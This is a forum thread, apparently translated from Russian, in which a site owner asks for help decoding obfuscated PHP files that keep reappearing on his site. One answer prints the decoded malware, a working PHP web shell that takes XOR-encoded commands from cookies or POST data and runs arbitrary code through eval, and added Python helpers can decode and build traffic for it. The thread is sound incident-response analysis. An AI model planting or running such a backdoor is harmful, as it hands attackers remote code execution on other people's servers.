PHP
Motorkaa, 2017-03-21 10:57:43

Any options to decrypt this PHP?

Some virus on the site constantly creates 2 files and starts spamming wildly. Who creates them and how, it has been impossible to establish. So I'm wondering whether deciphering them would help? Please suggest how, or with what, they could be brought into a readable form.
They are big, I couldn't post them here.
1st file.
hello-site.ru/share/Strannyj-kod
It didn't fit in there either; it ends like this:

'3DX13HmvKmDXuZB';
$djrxvctcq = Array('1'=>'D', '0'=>'1', '3'=>'Q', '2'=>'u', '5'=>'9', '4'=>'L', '7'=>'j', '6'=>'a', '9'=>'8', '8'=>'t', 'A'=>'f', 'C'=>'g', 'B'=>'7', 'E'=>'i', 'D'=>'0', 'G'=>'A', 'F'=>'n', 'I'=>'r', 'H'=>'p', 'K'=>'G', 'J'=>'b', 'M'=>'T', 'L'=>'2', 'O'=>'X', 'N'=>'v', 'Q'=>'m', 'P'=>'3', 'S'=>'J', 'R'=>'c', 'U'=>'E', 'T'=>'x', 'W'=>'o', 'V'=>'O', 'Y'=>'N', 'X'=>'K', 'Z'=>'k', 'a'=>'Y', 'c'=>'P', 'b'=>'w', 'e'=>'R', 'd'=>'d', 'g'=>'U', 'f'=>'Z', 'i'=>'W', 'h'=>'h', 'k'=>'6', 'j'=>'I', 'm'=>'l', 'l'=>'H', 'o'=>'V', 'n'=>'q', 'q'=>'B', 'p'=>'z', 's'=>'s', 'r'=>'5', 'u'=>'C', 't'=>'S', 'w'=>'M', 'v'=>'e', 'y'=>'F', 'x'=>'y', 'z'=>'4');
eval/*txilqla*/(omspplru($czbetc, $djrxvctcq));?>

2nd file.
hello-site.ru/share/Strannyj-kod2
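The tail quoted above shows the whole first stage of the obfuscation: a 62-entry table that maps one character to another, and an `eval` call split with an inline comment so that a naive search for `eval(` misses it. The helper below is an added example for this thread, not code from the question, the linked pastes or any answer. It parses that table straight out of the PHP literal, checks that it is reversible, applies it the way PHP's `strtr()` would, and finds `eval` sinks even when a comment is wedged into the call. It assumes that `omspplru` applies the table as a per-character substitution (some variants of this family append a `base64_decode`, which the fragment on the page does not show); the sample plaintext is constructed.

```python
import re

# Substitution table copied verbatim from the tail of the first file quoted in the question.
PHP_TABLE_LITERAL = "Array('1'=>'D', '0'=>'1', '3'=>'Q', '2'=>'u', '5'=>'9', '4'=>'L', '7'=>'j', '6'=>'a', '9'=>'8', '8'=>'t', 'A'=>'f', 'C'=>'g', 'B'=>'7', 'E'=>'i', 'D'=>'0', 'G'=>'A', 'F'=>'n', 'I'=>'r', 'H'=>'p', 'K'=>'G', 'J'=>'b', 'M'=>'T', 'L'=>'2', 'O'=>'X', 'N'=>'v', 'Q'=>'m', 'P'=>'3', 'S'=>'J', 'R'=>'c', 'U'=>'E', 'T'=>'x', 'W'=>'o', 'V'=>'O', 'Y'=>'N', 'X'=>'K', 'Z'=>'k', 'a'=>'Y', 'c'=>'P', 'b'=>'w', 'e'=>'R', 'd'=>'d', 'g'=>'U', 'f'=>'Z', 'i'=>'W', 'h'=>'h', 'k'=>'6', 'j'=>'I', 'm'=>'l', 'l'=>'H', 'o'=>'V', 'n'=>'q', 'q'=>'B', 'p'=>'z', 's'=>'s', 'r'=>'5', 'u'=>'C', 't'=>'S', 'w'=>'M', 'v'=>'e', 'y'=>'F', 'x'=>'y', 'z'=>'4')"

PAIR_RE = re.compile(r"'([^'\\])'\s*=>\s*'([^'\\])'")   # one 'k'=>'v' pair of single characters
BLOCK_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)         # /* ... */ anywhere, including inside a call
EVAL_RE = re.compile(r"\beval\s*\(")


def parse_php_char_table(literal: str) -> dict:
    """Turn a PHP Array('k'=>'v', ...) literal of one-character pairs into a dict."""
    return {k: v for k, v in PAIR_RE.findall(literal)}


def is_bijective(table: dict) -> bool:
    """The substitution can only be undone if no two keys share a value."""
    return len(set(table.values())) == len(table)


def invert(table: dict) -> dict:
    return {v: k for k, v in table.items()}


def substitute(text: str, table: dict) -> str:
    """Per-character replacement, as PHP strtr() does with an array of one-char keys;
    characters absent from the table (spaces, punctuation) pass through unchanged.
    Assumption: this is what the obfuscated omspplru() does with its second argument."""
    return "".join(table.get(ch, ch) for ch in text)


def find_eval_calls(code: str) -> list:
    """Offsets of eval( after block comments are stripped, so the eval/*txilqla*/(
    spelling from the question is not missed by a plain-text search."""
    cleaned = BLOCK_COMMENT_RE.sub("", code)
    return [m.start() for m in EVAL_RE.finditer(cleaned)]


if __name__ == "__main__":
    table = parse_php_char_table(PHP_TABLE_LITERAL)
    print(len(table), "entries, reversible:", is_bijective(table))
    # Constructed sample: encode a harmless statement with the inverse table, then undo it.
    plain = "echo 'decoded';"
    encoded = substitute(plain, invert(table))
    print(encoded, "->", substitute(encoded, table))
    print(find_eval_calls("eval/*txilqla*/(omspplru($czbetc, $djrxvctcq));"))
```

Because the table is a bijection, the first stage can be undone on paper without ever running the file; the same `find_eval_calls` check, run over a web root, also flags other files that use the comment-in-the-call trick.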

5 answer(s)
Pavel, 2017-03-21
@Motorkaa

pastebin.com/uNfLxXCu
PS: the script is not complete, because you yourself gave a broken source.

Rou1997, 2017-03-21
@Rou1997

If, excuse me, someone is shitting in the entrance hall, do you need to do a fecal analysis ("well, we'll do it and you'll see it there"), or do you still need to install a combination lock?
Probably this is not a virus on the site but a bot exploiting a shell-type vulnerability; that is, there is no "propagation" in this code itself. It originally came from somewhere, which means there is still a "hole", and if you haven't removed it yet, it hasn't disappeared by itself; it's still there and can be used...
And if it makes sense to analyze the code, then in addition to deobfuscation, debugging is always needed; without it, the analysis time grows exponentially with code size and encryption, so learn how to debug PHP.

Motorkaa, 2017-03-21
@Motorkaa

Changed eval to echo and saw everything.
But how to find what creates it?
Is it possible to see who created the file and how?
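The usual way to answer "who created the file" is to take the file's timestamp (`stat` on the server) and look at the web-server access log for requests that arrived just before it; a POST to a PHP file a second or two before the write is the typical culprit, and repeated hits to the same path from the same address point at the "hole" mentioned in the previous answer. The script below is an added example written for this thread, not code from any of the posts. The log lines, addresses, paths and the creation time are constructed; it assumes the Apache/nginx "combined" log format and that the web server log is available.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log line (assumed format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line: str):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def requests_near(lines, created_at: datetime, window_s: int = 120) -> list:
    """Requests logged within window_s seconds of the file's timestamp, POST requests
    first and then nearest in time: a dropped file is normally written by the request
    that was being processed when the timestamp was set."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rec["offset_s"] = (rec["time"] - created_at).total_seconds()
        if abs(rec["offset_s"]) <= window_s:
            hits.append(rec)
    hits.sort(key=lambda r: (r["method"] != "POST", abs(r["offset_s"])))
    return hits


# Constructed sample log (documentation IP ranges) and a constructed creation time
# in the +0300 zone, as reported by stat on the dropped file.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Mar/2017:10:35:02 +0300] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [21/Mar/2017:10:40:03 +0300] "POST /images/cache.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [21/Mar/2017:10:40:10 +0300] "GET /contacts.php HTTP/1.1" 200 4870 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [21/Mar/2017:10:55:41 +0300] "GET /robots.txt HTTP/1.1" 404 209 "-" "bot/1.0"',
]
FILE_CREATED = datetime(2017, 3, 21, 10, 40, 5, tzinfo=timezone(timedelta(hours=3)))

if __name__ == "__main__":
    for rec in requests_near(SAMPLE_LOG, FILE_CREATED, window_s=60):
        print(f'{rec["offset_s"]:+5.0f}s {rec["ip"]:<15} {rec["method"]} {rec["path"]} {rec["status"]}')
```

Two caveats: most Linux file systems expose only the modification time, so if the dropper rewrites the files on every visit you are looking at the latest write, not the first; and a request that creates a file is logged when it finishes, so keep the window on both sides of the timestamp rather than only before it.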

Rsa97, 2017-03-21
@Rsa97

The first script accepts an encrypted command via $_COOKIE or $_POST and returns the result of its execution.

<?php
// Cover tracks: no error log, no execution time limit.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

$command = NULL;
$pass = NULL;

// Shared secret; a request is only acted on if it carries this value in 'ak'.
$globalKey = 'cfa57343-5fb2-4c08-95bc-c0e9c5972f14';

// Repeating-key XOR: byte $i of $str is XORed with byte ($i mod strlen($key)) of $key.
function decode($str, $key)
{
    $result = "";

    for ($i = 0; $i < strlen($str);)
    {
        for ($j = 0; $j < strlen($key) && $i < strlen($str); $j++, $i++)
        {
            $result .= chr(ord($str[$i]) ^ ord($key[$j]));
        }
    }

    return $result;
}

// XOR with the global key, then with the per-request password (the cookie or POST field name).
function decode2($str, $key)
{
    global $globalKey;

    return decode(decode($str, $globalKey), $key);
}

// The last cookie wins: its name is the password, its value the payload.
foreach ($_COOKIE as $name => $value)
{
    $command = $value;
    $pass = $name;
}

// Fall back to POST fields in the same way.
if (!$command)
{
    foreach ($_POST as $name => $value)
    {
        $command = $value;
        $pass = $name;
    }
}

// base64 -> double XOR -> unserialize() of attacker-controlled data.
$command = @unserialize(decode2(base64_decode($command), $pass));
if (isset($command['ak']) && $globalKey == $command['ak'])
{
    if ($command['a'] == 'i')
    {
        // 'i': report the PHP version and the shell's own version.
        $versions = Array(
            'pv' => @phpversion(),
            'sv' => '1.0-1',
        );
        echo @serialize($versions);
    }
    elseif ($command['a'] == 'e')
    {
        // 'e': execute arbitrary PHP supplied in 'd'.
        eval($command['d']);
    }
    exit();
}
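Once the script is readable, the same logic can be turned around for incident response: if you have captured requests to the file (a proxy log, a packet capture, or a web server configured to log cookies and POST bodies), you can recover what the operator actually sent, since XOR with a fixed key is its own inverse. The analyzer below is an added example for this thread, not code from the answer above or from the script itself. It re-implements `decode`/`decode2` in Python, carries a minimal reader and writer for the subset of PHP's serialize() format the script uses (ints, strings, string-keyed arrays), and tries every cookie and POST field as (name = password, value = payload) exactly as the shell does. The key is the one from the decoded script; the cookie names and the sample request are constructed, and the sample only asks for the shell's version fingerprint (`'a' => 'i'`).

```python
import base64
import binascii
import re

# Key copied from the decoded script above (the value the shell compares against 'ak').
GLOBAL_KEY = "cfa57343-5fb2-4c08-95bc-c0e9c5972f14"


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """Equivalent of the script's decode(): byte i is XORed with key[i % len(key)]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode2(data: bytes, password: bytes) -> bytes:
    """Equivalent of decode2(): XOR with the global key, then with the field name.
    XOR is its own inverse, so the same call turns a plaintext into the wire form."""
    return xor_repeat(xor_repeat(data, GLOBAL_KEY.encode()), password)


def php_serialize(value) -> bytes:
    """Minimal PHP serialize() for ints, strings and string-keyed arrays."""
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError(type(value))


def php_unserialize(data: bytes):
    """Minimal PHP unserialize() for the same subset; raises ValueError on anything else."""
    pos = 0

    def parse():
        nonlocal pos
        tag = data[pos:pos + 1]
        if tag == b"i":
            m = re.match(rb"i:(-?\d+);", data[pos:])
            if not m:
                raise ValueError("bad int at %d" % pos)
            pos += m.end()
            return int(m.group(1))
        if tag == b"s":
            m = re.match(rb's:(\d+):"', data[pos:])
            if not m:
                raise ValueError("bad string at %d" % pos)
            n, start = int(m.group(1)), pos + m.end()
            if data[start + n:start + n + 2] != b'";':
                raise ValueError("bad string terminator at %d" % start)
            pos = start + n + 2
            return data[start:start + n].decode("utf-8")
        if tag == b"a":
            m = re.match(rb"a:(\d+):\{", data[pos:])
            if not m:
                raise ValueError("bad array at %d" % pos)
            pos += m.end()
            out = {}
            for _ in range(int(m.group(1))):
                key = parse()
                out[key] = parse()
            if data[pos:pos + 1] != b"}":
                raise ValueError("bad array terminator at %d" % pos)
            pos += 1
            return out
        raise ValueError("unsupported tag %r at %d" % (tag, pos))

    value = parse()
    if pos != len(data):
        raise ValueError("trailing data")
    return value


def analyze_request(cookies: dict, post: dict) -> list:
    """Try every cookie and POST field the way the shell does and report those that
    decode to a command carrying the shell's key, with the action and any PHP in 'd'."""
    findings = []
    for source, fields in (("cookie", cookies), ("post", post)):
        for name, value in fields.items():
            try:
                cmd = php_unserialize(decode2(base64.b64decode(value), name.encode()))
            except (ValueError, binascii.Error):   # not this shell's traffic
                continue
            if isinstance(cmd, dict) and cmd.get("ak") == GLOBAL_KEY:
                findings.append({"source": source, "field": name,
                                 "action": cmd.get("a"), "code": cmd.get("d")})
    return findings


# Constructed sample request: an ordinary cookie plus one that asks for the version fingerprint.
SAMPLE_COOKIES = {
    "lang": "ru",
    "sid": base64.b64encode(decode2(php_serialize({"ak": GLOBAL_KEY, "a": "i"}), b"sid")).decode(),
}

if __name__ == "__main__":
    for hit in analyze_request(SAMPLE_COOKIES, {}):
        print(hit)
```

Note that the shell passes the decoded bytes straight to `unserialize()`; the reader here deliberately accepts only scalars and arrays and raises on anything else, which is also the right behaviour for any analysis tooling that has to look at this traffic.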

MyMac, 2018-01-19
@MyMac

No JavaScript errors in the console?
Is the form itself being submitted?
